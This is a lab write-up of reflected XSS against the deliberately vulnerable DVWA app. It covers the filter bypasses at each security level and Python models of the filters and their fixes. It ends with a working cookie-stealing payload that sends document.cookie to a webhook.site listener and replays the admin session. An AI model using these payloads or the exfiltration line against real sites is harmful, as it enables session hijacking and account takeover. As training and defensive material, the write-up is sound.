XSS-Reflected

What is Reflected-XSS?

XSS stands for Cross-Site Scripting. It is a code injection attack: attacker-controlled input ends up in a web page where the victim's browser interprets it as HTML or JavaScript instead of plain data.

Reflected (non-persistent) XSS occurs when the malicious payload is carried in the request to the vulnerable web application and the server echoes it back, so the HTTP response contains the payload. Attackers use social engineering techniques such as phishing to make the victim send a request that contains the script, typically by clicking a crafted link. The victim's browser then executes the script when it renders the HTTP response.

Because the payload is not stored anywhere, every victim has to send the malicious request themselves, so attackers try to reach as many users as possible, usually with a crafted link sent by e-mail or message. Common injection points are search result pages, error messages and form submissions, anywhere the application echoes a request parameter back into the page. Reflected XSS is one of the most common XSS types because the attacker does not need to find a place in the application where a script can be stored permanently.

This is a Reflected-XSS simulation that I did on DVWA (Damn Vulnerable Web Application), working through the Low, Medium and High security levels.

Low

Screenshot (21)

First of all I check the source code. At the Low level the value of the name parameter, $_GET[ 'name' ], is concatenated straight into the page output with no validation or encoding at all, so whatever is submitted is printed back as HTML.

Screenshot (24)

So now we know we can inject into the text box (its contents are sent as the name parameter). Here I enter the JS script <script>alert("Taming here")</script>, the alert pops, and we can see that this page is vulnerable to XSS.

Medium

Screenshot (22)

At the Medium level I found str_replace( '<script>', '', $_GET[ 'name' ] ); in the source. This replaces every exact, case-sensitive occurrence of the string <script> with '', so if we enter the word <script> that string is deleted from the input before it is echoed.

Screenshot (25)

So the solution is to change any letter in <script> to uppercase: str_replace is case-sensitive, so <Script> does not match the pattern '<script>', while the browser still treats it as a script tag because HTML tag names are case-insensitive. Now I change <script> to <Script>, and entering <Script>alert("Taming here")</script> shows that the page still has an XSS vulnerability. Two other bypasses work for the same reason: str_replace makes a single pass, so <scr<script>ipt> collapses to <script> once the inner occurrence is removed, and a tag with an event-handler attribute (such as the <image src/onerror=alert(1)> payload used at the High level below) needs no script tag at all.

High

Screenshot (23)

At the High level we can see in the source code preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );. This regular expression matches a < followed, in that order and with anything in between, by the letters s, c, r, i, p and t, and replaces the match with '' so it is deleted. The /i modifier makes it case-insensitive and the (.*) groups allow any characters between the letters, so <Script>, <scr<script>ipt> and similar tricks are all caught. This means we cannot inject a script tag; it does not, however, touch any other tag.

Screenshot (26)

So I tried to find a solution on the PortSwigger website, where I learned that JavaScript can also run from ordinary HTML tags through event-handler attributes, so an alert can be triggered without a script tag at all.

Screenshot (27)

Now we can see that I have bypassed it by entering <image src/onerror=alert(1)>. The regex never matches because after the < the letters s, c, r, i, p, t do not all appear in that order (there is no i after the r of onerror). The browser parses <image> as an <img> tag; its src attribute is empty, so the image fails to load and the onerror handler fires.
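To make the three filters and their bypasses concrete, the following is an added Python model of the server-side filtering at the Low, Medium and High levels, plus a fourth variant that HTML-encodes the input (the equivalent of PHP's htmlspecialchars), which is the actual fix. This is example code written for this page, not DVWA's own code (DVWA is PHP); str.replace and re.sub mirror the single-pass, case-sensitive str_replace and the case-insensitive preg_replace used by DVWA, and the executes_js check is a simple heuristic for "a script tag or event handler survived into the output", not a browser.

```python
import html
import re

# Pure-Python models of the server-side filters in DVWA's reflected XSS page.
# DVWA itself is PHP; these re-implement the behaviour of its str_replace and
# preg_replace calls so the bypasses can be tested without a browser.


def filter_low(name: str) -> str:
    """Low: the name parameter is echoed as-is."""
    return name


def filter_medium(name: str) -> str:
    """Medium: str_replace('<script>', '', $name).

    PHP str_replace is case-sensitive and makes a single pass over the
    input, which Python's str.replace mirrors exactly.
    """
    return name.replace("<script>", "")


# preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name): a '<'
# followed somewhere by s, c, r, i, p, t in that order, case-insensitive.
HIGH_PATTERN = re.compile(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", re.IGNORECASE)


def filter_high(name: str) -> str:
    """High: delete anything that looks like '<...s...c...r...i...p...t'."""
    return HIGH_PATTERN.sub("", name)


def filter_fixed(name: str) -> str:
    """The real fix: encode for HTML output (PHP htmlspecialchars equivalent)
    instead of trying to blocklist dangerous strings."""
    return html.escape(name, quote=True)


def render(filter_fn, name: str) -> str:
    """Build the fragment the way the DVWA page does: '<pre>Hello NAME</pre>'."""
    return "<pre>Hello " + filter_fn(name) + "</pre>"


# A '<script' tag or an event-handler attribute inside a tag that survives
# into the output is what makes the browser run attacker JavaScript.
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
EVENT_HANDLER = re.compile(r"<\w+[^>]*\bon\w+\s*=", re.IGNORECASE)


def executes_js(rendered: str) -> bool:
    """Heuristic: does the rendered HTML still contain executable JS?"""
    return bool(SCRIPT_TAG.search(rendered) or EVENT_HANDLER.search(rendered))


FILTERS = {
    "low": filter_low,
    "medium": filter_medium,
    "high": filter_high,
    "fixed": filter_fixed,
}


def bypasses(payload: str) -> dict:
    """Map each level to whether the payload still executes after filtering."""
    return {level: executes_js(render(fn, payload)) for level, fn in FILTERS.items()}


# Payloads from the walkthrough plus the nested-tag trick against str_replace.
PAYLOADS = {
    "plain": '<script>alert("Taming here")</script>',
    "case": '<Script>alert("Taming here")</script>',
    "nested": '<scr<script>ipt>alert("Taming here")</script>',
    "onerror": '<image src/onerror=alert(1)>',
}

if __name__ == "__main__":
    for label, payload in PAYLOADS.items():
        print(f"{label:8s} {bypasses(payload)}")
```

Running it shows the progression from the write-up: the plain payload only works at Low, the uppercase and nested variants also pass Medium, the onerror payload passes all three blocklists, and none of them survive output encoding. The lesson is that each level blocks one string rather than fixing the sink.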

Exploiting XSS-Reflected to steal cookies

Screenshot (43)

First of all I will use a webhook as a listener to capture cookies. Here I take the following listener link and combine it with a JS script of the form <script>document.location='?c='+document.cookie;</script>, using the URL https://webhook.site/3c1b2da1-3088-4793-8540-639634828977

Combined, it looks like this: <script>document.location='https://webhook.site/3c1b2da1-3088-4793-8540-639634828977?c='+document.cookie;</script>

Screenshot (37)

After that I inject the script into the text box while logged in to DVWA as the admin user. As you can see in the URL, the listener not only captures the session cookie but also the security cookie that records which DVWA level is in use. In a real situation the victim would not type the payload themselves; the attacker would deliver the URL carrying it through a phishing attack or other social engineering.

Screenshot (40)

If I go back to the webhook website we can see I have received the admin's cookie.

Screenshot (45)

Lastly, I can use this cookie to access the application as admin by replacing my own session cookie with the captured one, which gives me the features that are not available to normal users. Note that this only works because document.cookie can read the session cookie: a cookie set with the HttpOnly flag is invisible to JavaScript and cannot be stolen this way (the attacker can still make requests from the victim's browser, but cannot carry the session elsewhere).
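As an added example that is not part of the original write-up, the following Python models the whole theft chain offline: which cookies document.cookie would expose given the server's Set-Cookie headers, how the payload encodes them into the listener URL, and what the listener decodes. The Set-Cookie values are constructed for the example (PHPSESSID is PHP's default session cookie name and security is the DVWA level cookie seen above, but the values are made up); the listener URL is the one used in the walkthrough. Unlike the raw concatenation in the payload above, the URL is built with percent-encoding (the equivalent of encodeURIComponent) so that '=', ';' and '&' in the cookie string cannot break the query.

```python
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, quote, urlsplit

# End-to-end model of the cookie theft: what the server sets, what
# document.cookie exposes, how the payload encodes it into the listener URL,
# and what the listener decodes. Every header value below is constructed for
# this example, not captured from a real target.

LISTENER = "https://webhook.site/3c1b2da1-3088-4793-8540-639634828977"


def document_cookie(set_cookie_values):
    """Reproduce the string document.cookie returns in the browser: every
    cookie from the Set-Cookie header values except those flagged HttpOnly,
    joined with '; '."""
    visible = []
    for value in set_cookie_values:
        jar = SimpleCookie()
        jar.load(value)
        for name, morsel in jar.items():
            if not morsel["httponly"]:
                visible.append(f"{name}={morsel.value}")
    return "; ".join(visible)


def exfil_url(cookie_string):
    """The URL the payload navigates to. quote(..., safe='') behaves like
    encodeURIComponent, so '=', ';' and spaces survive the query string."""
    return f"{LISTENER}?c={quote(cookie_string, safe='')}"


def decode_listener_hit(request_line):
    """Parse the request line the listener logs and recover the cookies."""
    path = request_line.split(" ")[1]
    raw = parse_qs(urlsplit(path).query).get("c", [""])[0]
    jar = SimpleCookie()
    jar.load(raw)
    return {name: morsel.value for name, morsel in jar.items()}


def steal(set_cookie_values):
    """Simulate the whole chain and return what the attacker ends up with."""
    exposed = document_cookie(set_cookie_values)
    parts = urlsplit(exfil_url(exposed))
    request_line = f"GET {parts.path}?{parts.query} HTTP/1.1"
    return decode_listener_hit(request_line)


# Constructed Set-Cookie header values: a DVWA-style session cookie and the
# level cookie, with no HttpOnly protection.
WEAK_SET_COOKIES = [
    "PHPSESSID=abc123; Path=/",
    "security=low; Path=/",
]
# The same cookies with HttpOnly on the session cookie.
HARDENED_SET_COOKIES = [
    "PHPSESSID=abc123; Path=/; HttpOnly",
    "security=low; Path=/",
]

if __name__ == "__main__":
    print("weak     ->", steal(WEAK_SET_COOKIES))
    print("hardened ->", steal(HARDENED_SET_COOKIES))
```

With the weak headers the listener receives both PHPSESSID and security, which is what the screenshots above show; with HttpOnly on the session cookie only the harmless security cookie leaks, so the session cannot be replayed from the attacker's machine.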
